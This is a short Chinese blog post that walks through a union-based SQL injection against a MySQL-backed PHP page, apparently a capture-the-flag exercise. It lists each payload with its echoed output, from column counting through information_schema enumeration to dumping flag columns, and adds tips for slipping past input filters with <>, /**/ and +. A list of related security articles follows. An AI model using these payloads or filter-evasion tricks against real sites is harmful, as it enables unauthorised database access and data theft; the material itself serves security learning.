針對mysql的sql注入

原創 hibari_18 2019-03-14 04:29 
//判斷order by後面的個數
http://xxx.com/index.php?id=1 order by 3

//判斷哪一個可回顯
http://xxx.com/index.php?id=-1 union sel<>ect 1,2,3

//注入數據庫名
http://xxx.com/index.php?id=-1 union sel<>ect 1,database(),3
//回顯,庫名
sqli

//注入表名
http://xxx.com/index.php?id=-1 union sel<>ect 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'
//回顯,表名
info,users

//注入info表的列名
http://xxx.com/index.php?id=-1 union sel<>ect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'
//列名
id,title,flAg_T5ZNdrm

//注入users表的列名
http://xxx.com/index.php?id=-1 union sel<>ect 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
//列名
id,username,flag_9c861b688330

//注入sqli.info
http://xxx.com/index.php?id=-1 union sel<>ect 1,group_concat(id,title,flAg_T5ZNdrm),3 from sqli.info
//內容(flag打碼)
1flag{在數據庫中}flag{xxxxxxxxxxxxxxxxxxxxxxxx},2testtest

//注入sqli.users
http://xxx.com/index.php?id=-1 union sel<>ect 1,group_concat(id,username,flag_9c861b688330),3 from sqli.users
//內容
無回顯 不知道是表空 還是被過濾了。。

tips: 
1.有時候可嘗試 <> /**/ + 等符號繞過防禦函數,如果沒有任何防禦機制,可以把<>去掉。
2.一般union前面用id=-1(不存在的值)可以把多餘的東西去掉。
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

MSF基本命令及實例

目錄MSF基本架構RexMSF::CoreMSF::BasePlugin插件MSF數據庫恢復數據庫技術功能模塊(不是流程模塊)MSF基本使用和控制檯命令(MSFconsole)更新地位幫助命令MSF控制檯基本命令模塊內基本命令數據

Nero, 2020-07-08 03:17:43

常見web攻擊的加固方法

0x01 XSS 1.過濾特殊字符(XSS Filter) 過濾惡意標籤+屬性 (1)href僞協議 <a href=javascript:('/a/')>test</a> (2)HTML新增標籤 <math><maction

hibari_18 2020-07-07 23:58:29

3vilTwinAttacker AP僞裝工具

下載3vilTwinAttacker:    git clone https://github.com/P0cL4bs/3vilTwinAttacker.git    cd 3vilTwinAttacker chmod +x instal

鱼与羽 2020-07-07 11:32:53

Airolib 密碼分析提速-學習筆記

echo TP_Link722 > essid.txt#將AP的廣播名生成TXT airolib-ng db --import essid essid.txt#根據essid生成數據庫 airolib-ng db --stats#查看數據

鱼与羽 2020-07-07 11:32:52

AIREPLAY-NG的使用學習筆記

指令:aireplay-ng <options> <interface name> 例子:airplay-ng -9 wlan0mon #測試AP的注包通信質量 airplay-ng -9 wlan0mon -e TP-LINK_0450

鱼与羽 2020-07-07 11:32:52

Linux學習運維基礎網絡知識

運維基礎網絡知識 NA --- 網絡助手級別(6天) NP --- 網絡專業級別(4個部分 4天) IE --- 網絡專家級別 (2-3月) 運維基礎網絡知識概述 TCP協議概念知識 TCP十一種狀態集轉換 網絡重要協議原理 D

蔡建辉 2020-07-07 06:15:45

網站滲透實戰試驗(僅供參考)

首先收集必要的信息 發現存在php探針,phpinfo,phpmyadmin 常用的垃圾弱口令登錄失敗。 嘗試登錄後臺,網站使用帝國cms7.2系統 弱口令登錄失敗,使用網絡上帝國cms的通用漏洞,行不通失敗。 在知道絕對路徑的情

qq_2190630418 2020-07-05 04:49:30

滲透測試----簡介

滲透測試是一種通過模擬攻擊者的技術和方法,挫敗目標系統的安全控制措施並取得訪問控制權的安全測試方式。 一、PDES標準中的滲透測試階段 PDES標準中的滲透測試階段使用來定義滲透測試過程,並確保客戶組織能夠以一種標準化的方式來擴展

野九 2020-07-05 03:38:14

metasploit中msf框架以及更新

今天剛開始學習Metasploit時就遇到問題,經過反覆查找最終還是沒能搞定,在學長的指導下發現原來是我kali中metasplooit更新的問題。經查資料:自15年底的kali2.0版本開始,Kali團隊不再使用Rapid7 提

野九 2020-07-05 03:38:14

OGNL漏洞原理與解決方案

一,漏洞存在的地方和原理 Struts2的核心是使用的webwork框架,處理 action時通過調用底層的getter/setter方法來處理http的參數,它將每個http參數聲明爲一個ONGL(這裏是ONGL的介紹)語句。當我們提交

MoYanHanHuiLengMa 2020-07-05 02:22:57

secureCat掃描nginx

一. ngnix用途 1. Web 服務器: 相比 Apache,Nginx 使用更少的資源,支持更多的併發連接,體現更高的效率,這點使 Nginx 尤其受到虛擬主機提供商的歡迎。能夠支持高達 50,000 個併發連接數的響應,感謝 Ng

MoYanHanHuiLengMa 2020-07-05 02:22:56

滲透測試題

1. mongodb,redis的默認端口; *默認端口 27017 ,6379 redis安全配置項 1.在配置文件中設置監聽ip:bind 127.0.0.1 1.1.1.1 (多個IP用空格分開) 2.更改默認端口6379 3.設置

MoYanHanHuiLengMa 2020-07-05 02:22:56

pikachu靶場 :六、文件包含漏洞

pikachu靶場 :六、文件包含漏洞 概述本地文件包含漏洞遠程文件包含漏洞 概述 文件包含,是一個功能。 在各種開發語言中都提供了內置的文件包含函數,其可以使開發人員在一個代碼文件中直接包含(引入)另外一個代碼文件。 比如 在P

CN_wanku 2020-07-01 17:44:04

[滲透測試][Kali]對DC-2靶機進行滲透測試

對DC-2靶機進行滲透測試 1.搭建滲透平臺 2.準備工作 3.掃描端口 4.使用wpscan進一步掃描 5.破解密碼 6.登陸ssh 7.root權限提升 1.搭建滲透平臺 Kali 2018, DC-2靶機, VMWare虛

Bob Xiao 2020-06-30 01:15:22

[滲透測試][Kali]對DC-1靶機進行滲透測試

對DC-1靶機進行滲透測試 1.搭建滲透平臺 Kali 2018, DC-1靶機, VMWare虛擬機平臺 2.準備工作 使用nmap發現局域網中的主機 shell命令 nmap -sn 192.168.12.0/24 she

Bob Xiao 2020-06-30 01:15:22